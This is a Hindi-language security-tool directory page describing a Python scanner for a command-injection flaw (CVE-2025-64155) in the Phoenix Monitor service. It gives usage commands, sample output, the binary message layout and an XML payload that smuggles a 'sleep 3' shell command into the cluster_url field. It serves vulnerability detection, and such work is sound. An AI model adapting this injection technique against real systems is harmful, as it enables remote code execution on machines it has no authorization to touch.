Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-हंटर | Kitploit
उपकरण/GitHubGitHub/purehate/cve-2025-64155-hunter
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-हंटर

रिपॉजिटरी देखें
126 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-64155 स्कैनर

Phoenix Monitor सेवा में कमांड इंजेक्शन भेद्यता (CVE-2025-64155) का पता लगाने के लिए एक Python स्कैनर।

विवरण

CVE-2025-64155 Phoenix Monitor सेवा में एक कमांड इंजेक्शन भेद्यता है जो handleStorageRequest कमांड (कमांड ID: 1075724911) में cluster_url पैरामीटर के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है।

यह भेद्यता तब उत्पन्न होती है जब cluster_url फ़ील्ड में उपयोगकर्ता-नियंत्रित इनपुट उचित स्वच्छता के बिना एक शेल कमांड को पास किया जाता है, जिससे शेल मेटाकैरेक्टर के माध्यम से कमांड इंजेक्शन की अनुमति मिलती है।

यह स्कैनर Horizon3AI द्वारा किए गए एक्सप्लॉइट शोध पर आधारित है।

विशेषताएँ

  • समय-आधारित पहचान: सुरक्षित, गैर-विनाशकारी समय-आधारित पहचान विधि का उपयोग करता है
  • SSL/TLS समर्थन: प्रमाणपत्र सत्यापन बाईपास के साथ SSL कनेक्शन को संभालता है
  • वर्बोज़ मोड: डिबगिंग के लिए विस्तृत आउटपुट
  • सेवा जाँच: भेद्यता का परीक्षण किए बिना सेवा की पहुंच की जाँच करने का विकल्प

आवश्यकताएँ

  • Python 3.6+
  • केवल मानक लाइब्रेरी (कोई बाहरी निर्भरता नहीं)

उपयोग

बुनियादी स्कैन

root@kitploit:~
python3 scanner.py -t <target_ip>

उन्नत विकल्प

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

कमांड लाइन तर्क

  • -t, --target: लक्ष्य IP पता या होस्टनाम (आवश्यक)
  • -p, --port: Phoenix Monitor सेवा पोर्ट (डिफ़ॉल्ट: 7900)
  • --timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)
  • -v, --verbose: विस्तृत आउटपुट सक्षम करें
  • --check-only: केवल जाँचें कि सेवा सुलभ है या नहीं

यह कैसे काम करता है

स्कैनर एक समय-आधारित पहचान विधि का उपयोग करता है:

  1. SSL/TLS के माध्यम से Phoenix Monitor सेवा से जुड़ता है
  2. cluster_url फ़ील्ड में sleep 3 वाले दुर्भावनापूर्ण पेलोड के साथ एक handleStorageRequest कमांड भेजता है
  3. प्रतिक्रिया समय मापता है
  4. यदि प्रतिक्रिया में ~3 सेकंड की देरी होती है, तो लक्ष्य संभवतः असुरक्षित है (कमांड निष्पादित किया गया था)

यह विधि सुरक्षित और गैर-विनाशकारी है - यह हानिकारक कमांड नहीं चलाती, केवल पहचान के उद्देश्य से एक हानिरहित sleep कमांड चलाती है।

उदाहरण आउटपुट

असुरक्षित लक्ष्य

root@kitploit:~
[*] CVE-2025-64155 स्कैनर
[*] लक्ष्य: 192.168.1.100:7900

[*] CVE-2025-64155 के लिए 192.168.1.100:7900 स्कैन किया जा रहा है...
[*] 192.168.1.100:7900 से जुड़ रहा है...
[*] सफलतापूर्वक जुड़ा
[*] परीक्षण पेलोड भेजा जा रहा है...
[*] 3.12 सेकंड में प्रतिक्रिया (1024 बाइट्स) प्राप्त हुई

============================================================
[+] असुरक्षित: लक्ष्य CVE-2025-64155 के प्रति असुरक्षित प्रतीत होता है
[+] विवरण: समय-आधारित पहचान: प्रतिक्रिया में 3.12 सेकंड की देरी (संभवतः कमांड इंजेक्शन)

असुरक्षित नहीं लक्ष्य

root@kitploit:~
[*] CVE-2025-64155 स्कैनर
[*] लक्ष्य: 192.168.1.100:7900

[*] CVE-2025-64155 के लिए 192.168.1.100:7900 स्कैन किया जा रहा है...
[*] 192.168.1.100:7900 से जुड़ रहा है...
[*] सफलतापूर्वक जुड़ा
[*] परीक्षण पेलोड भेजा जा रहा है...
[*] 0.45 सेकंड में प्रतिक्रिया (1024 बाइट्स) प्राप्त हुई

============================================================
[-] असुरक्षित नहीं: लक्ष्य असुरक्षित प्रतीत नहीं होता
[-] विवरण: तुरंत प्रतिक्रिया प्राप्त हुई (0.45s), संभवतः असुरक्षित नहीं

तकनीकी विवरण

संदेश प्रारूप

स्कैनर निम्नलिखित संरचना के साथ एक बाइनरी संदेश भेजता है:

root@kitploit:~
[4 बाइट्स] संदेश लंबाई (156)
[4 बाइट्स] पेलोड लंबाई
[4 बाइट्स] कमांड ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 बाइट्स] पैडिंग/फ्लैग (0)
[चर] XML पेलोड

पेलोड संरचना

XML पेलोड में cluster_url फ़ील्ड में एक कमांड इंजेक्शन होता है:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण करने की आपको स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें